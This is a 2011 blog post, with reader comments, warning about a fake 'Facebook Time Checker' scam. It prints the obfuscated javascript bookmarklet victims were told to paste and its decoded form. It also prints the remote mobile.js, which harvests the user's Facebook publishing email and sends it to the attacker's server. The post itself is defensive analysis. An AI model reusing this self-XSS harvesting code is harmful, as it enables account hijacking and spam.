Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker !
Posted by Dan | Filed under Down to Earth News, Material Things, products, services, maintenance
HERE IS HOW MY FACEBOOK PERSONAL PUBLISHING ADDRESS GOT STOLEN:
Update 2011.01.25 – For a complete German language translation you can visit Elias’s blog.
( Using it’s personal publishing address a Facebook user can post pictures and messages by directly sending and email to this address. If someone knows your personal publishing address it can impersonate your and post messages and pictures without your consent, or without you even knowing. This can be very well used by ill intended persons to spam Facebook beyond usability. )
I recently ( 2011.01.18 – around 00:00, GMT ) clicked a link send by a friend of mine on Facebook and … i eventually did do what they said me to do. I was a little bit tired and not very attentive at the job in hand.
The link looked like: ” Ive spent over 132 hours on facebook in my lifetime! Wow that\’s a lot of time wasted! Find out how much time you\’ve spent on facebook here – http://g_o_o.gl/AYkjm” ( “_” in the website name is intentionally added by me here and into the following links to prevent unintentional clicking ). This shortened address “http://goo.gl/A_Y_k_j_m” forwarded me to “http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/next.php?id=SCiGm_d“. This page I arrived to was called “Facebook Time Checker“. The page was pretending that by doing some “browser magic” i would get as result the amount of time that i have spent on Facebook!
IT IS NOT TRUE ! ONLY FACEBOOK KNOWS THIS THING AND IS NOT PUBLIC !
IT’S JUST A GOOD PRETEXT FOR A THIRD PARTY TO STEAL YOUR PRIVATE INFORMATION !
They advised me to copy paste this Javascript into by browser to check the time i have spent on Facebook up to now.
Here is the Javascript ( DON’T EVEN THINK TO COPY PASTE THIS INTO YOUR BROWSER )
javascript:var _0xbdfc=[
“\x73\x63\x72\x69\x70\x74”,
“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74”,
“\x73\x72\x63”,
“\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77
\x2e\x6e\x65\x77\x73\x31\x37\x63\x68\x61
\x6e\x6e\x65\x6c\x2e\x63\x6f\x6d\x2f\x74
\x69\x6d\x65\x2f\x6d\x6f\x62\x69\x6c\x65
\x2e\x6a\x73”,
“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64”,
“\x62\x6F\x64\x79”
];
var script=document[_0xbdfc[1]](_0xbdfc[0]);
script[_0xbdfc[2]]=_0xbdfc[3];
document[_0xbdfc[5]][_0xbdfc[4]](script);
void(0);
I did as they said mostly because i was doing things mechanically at that time…
Then i realised that maybe i did something bad so i started checking what the script was doing.
First i have translated the script into a human readable form:
javascript:var _0xbdfc=[
“scipt”,
“createElement”,
“src”,
“http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/mobile.js”,
“appendChild”,
“body”
];
var script=document[_0xbdfc[1]](_0xbdfc[0]);
script[_0xbdfc[2]]=_0xbdfc[3];
document[_0xbdfc[5]][_0xbdfc[4]](script);
void(0);
Obviously this appends a java script file located on that remote server to our current session.
Let’s check the mobile.js file:
//Append jquery library
var newjs = document.createElement('script');
newjs.setAttribute('src', 'http://s_o_c_i_a_l_g_i_f_t_s.info/jquery.js');
document.body.appendChild(newjs);
setTimeout(function(){
//Grab post form id and other stuff for posting
if(location.href == "http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/index.php")
{
alert("Wrong Page. You must paste the script into your browser's\n
address bar on any facebook tab or window.\n\n Then Hit Enter!");
return;
}
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
//grab mobiles
$.get("http://m.facebook.com/upload.php", function(data){
var mydata = data;
var mobiles;
var count = 0;
$($(mydata).find('a').filter(':contains("m.facebook.com")')).
each(function(){if(($(this).text() != undefined)){ mobiles += $(this).text() +";";}});
var clean = mobiles.replace("undefined","");
var cut = clean.slice(0,clean.length - 1);
var insert = cut.replace(/;/g,",");
//Redirect to php inserter which redirects back to next set of steps.
top.location.href = 'http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/
time/check.php?get=1&m=,'+insert;
});
},2000);
alert("Time Checker Processing - Please wait 2 seconds and click OK to view results.");
By looking at this file we can immediately recognize that the script will load your uploads.php Mobile Facebook page and then harvest the text between the “m.facebook.com” text.
The text contains your personal upload email.
The last thing the script does is that it sends this email back to the third party website.
They now control your Facebook! Using this email they can post anything to your Facebook page without your permission !!
If by mistake, you, like me, already did all the stuff you are not suppose to be doing … you need to:
!!! GO TO YOUR http://m.facebook.com/upload.php PAGE AND RESET YOUR PERSONAL PUBLISHING ADDRESS !!!
By resetting the address Facebook generates a new one for you ! It’s OK because the attacher has no way to find out your new publishing address!
I really hope people read this in time not to “F”word their Facebook ! If you know other websites hosting this type of attack please let us know ( comments are welcome ). Below is a list with such websites ( “_” added to prevent the risks of an unintentional click ):
- http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/
- http://2_2_0.1_1_2.3_6.1_7_8/
UPDATES
2011.01.23 – Seems also German Facebook users are tricked in using this javascript and probably much more users with different languages. In this case if someone has the ability to translate this post into other languages so that others can read this in their mother language we welcome his help. Please let me know if there are such translations and provide us with the appropriate link. I hereby permit anyone to translate the content of this post as long as it’s placing a link to this page in the translated version.
2011.01.24 – Serbian users are also tricked into using a different form of script. I have dedicated another post for this one. The principle is the same. One would insert a JavaScript into browser address bar that loads in turn another more potent script. Searching for internet for more references i have found that this scripts are not so new as i thought they are. The only problem is that this social websites are making this scripts viral. I guess Facebook should implement some system to filter this scripts automatically. It can check the posts of it’s users by some patterns and check also the links their users provide for remains of such scripts. As i know about their Copyright policy they own the rights to do whatever they want with the users content… so this can be no problem whatsoever.
2011.01.25 Elias made an complete translation of my post in German language here. Thanks!
Tags: Facebook, FAKE, fraud, javascript, protection, publishing email, third party, Time Checker
January 19th, 2011 at 5:35 am
Hi there,
I have done exactly the same thing as you….and fortunately you are the first one who dealt with the problem.
I also followed the steps you said, but my problem is, that i can’t reset the publishing address to “zero” but Facebook just generates a new one. Do you have any solution for that?
Or is there a possibility where i could enter my new publishing address instead of resetting it?!
Thanks in advance!
January 21st, 2011 at 5:00 pm
Thank you very very much for this Dan!!
I also did this, and then i got this spam messages in my profile.
Now I did a reset of my mobilephone-upload address and i hope it will work 😉
So thank you, you are the best!
January 21st, 2011 at 5:55 pm
Today some friends posted this rubbish in german FB and I searched for
a) the problem
b) the solution
I found both! :))
The mobile.js changed it’s location to China: http://2_2_0.1_1_2.3_6.1_7_8/ and we have german js-messages, too.
The “social gift” (in german: “social poison” 😉 lasts.
Many thanks!
January 22nd, 2011 at 10:48 am
HN,
as long as you have generated a new Facebook publishing email address the problem is solved ! I think you cannot disable this option yet but the attacher has no way knowing your new address as long as you don’t use their script !
Regards,
Dan
January 23rd, 2011 at 7:30 am
http://2_2_0.1_1_2.3_6.1_7_8/~biznews2/time/next.php?id=gTttGd
but luckily i googled the script before i copy&pasted it 😉
January 23rd, 2011 at 3:04 pm
Thank you very much!
January 23rd, 2011 at 3:09 pm
Thank you very much for this!!
But I have a question. I pasted the script into the default Facebook home (www.facebook.com) and not into the m.facebook.com one.
Does it saves me from the scam?
January 23rd, 2011 at 4:07 pm
[…] Fratzenbuch-Äpp, die angeblich feststellt, wieviel Zeit man im Fratzenbuch verbracht hat, ist eine üble Malware. Wer diesen Müll bei sich verbastelt hat, der hat ein paar Spammern oder noch üblerem […]
January 23rd, 2011 at 4:54 pm
[…] This post was mentioned on Twitter by Niels Heidenreich and Elias Schwerdtfeger, Michael Witkowski. Michael Witkowski said: Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker ! http://j.mp/hasSJg via @AddToAny […]
January 23rd, 2011 at 5:21 pm
[…] So fängt man sich das ach so lustige Posting mit der blauen Facebook Uhr und dem Text “I’ve spent over 27 hours on facebook in my lifetime! Wow that’s a lot of time wasted!…” – und so wird man das Posting los und verhindert, dass nochmal Spam via Facebook Mobile Publishing Adresse gepostet wird. […]
January 23rd, 2011 at 11:45 pm
No ! as long as you are logged in into Facebook using that browser the scam works 🙁
The script loads the mobile version without you even knowing it!
Dan
January 24th, 2011 at 8:46 am
[…] folgende Text ist eine schnelle Übertragung eines englischsprachigen Textes im Blog „Useful for me“. Die Publikation einer Übersetzung ist dort ausdrücklich gestattet, und weil diese […]
January 24th, 2011 at 8:52 am
I made a complete translation of your post in german language together with some annotations for the less technical literates.
Thanks for your great post!
January 26th, 2011 at 9:03 am
If I reset the personal publishing address, do I have to do anything on an Android phone that has my FB app on it, too?
January 27th, 2011 at 6:15 am
Thanks for the help man!!
January 27th, 2011 at 9:30 pm
If you have used by mistake exactly this script then just resetting your personal publishing address is enough.
Your Android/iPhone app is not affected by this in any.
January 29th, 2011 at 2:33 am
Hello,
Ahem, thank you. Really useful
February 14th, 2011 at 3:07 am
[…] potrzebne dane i ruszyłem na poszukiwanie rozwiązania w Googlach.Z pomocą przyszedł blog Use ful for me, który opisał podobny sposób wykradania informacji z Facebooka. Zostanie fanem aplikacji oraz […]
February 15th, 2011 at 10:15 am
Hey,
thanks a lot for your solution, it already worked out for my personal page.
but what about fan pages i’m admin of? i’ve got a fanpage with 4 different persons as admins. unfortunately i was the only one that clicked on that shit. anyway..
i already cut me off as admin, but the script is still posting to my fanpage.
so is there another mobile adress for fanpages?
maybe you’ve got any ideas.
thanks a lot!
February 15th, 2011 at 8:51 pm
Thank you very much! have been looking for a solution for a long time.
Regards Simon
February 20th, 2011 at 4:23 am
Great article..I want to know can i decode Java script obfuscated code ???
February 22nd, 2011 at 8:43 am
Can u give me a more specific example of code ? I am not very familiar with JavaScript obfuscation but, because Java is a high level language that will compile in a high level form it should not be so hard to reverse parts of the code you need.
April 11th, 2011 at 2:55 pm
I have same problem:
One of my friend taged me in this post “wtf guys, you appeared as the people who stalked me the most, you can see yours at http://zxc.fbglitch-b.info/?p3j9xhk” , i went there and i did things , now automatically my account send spams and messages to my friends!!!
April 11th, 2011 at 3:17 pm
Thank you Dan, i will translate this post 2 Persian 🙂
September 19th, 2011 at 5:04 am
Hi there very cool web site!! Man .. Beautiful .. Superb .. I will bookmark your blog and take the feeds also?I am happy to search out so many useful information right here in the post, we want work out extra techniques in this regard, thank you for sharing. . . . . .
November 21st, 2011 at 2:50 pm
Remarkable issues here. I’m very glad to peer your article. Thanks so much and I am taking a look forward to contact you. Will you please drop me a mail?
January 14th, 2012 at 10:29 am
I can not see where you can reset your personal publishing address. Have they remove this ability?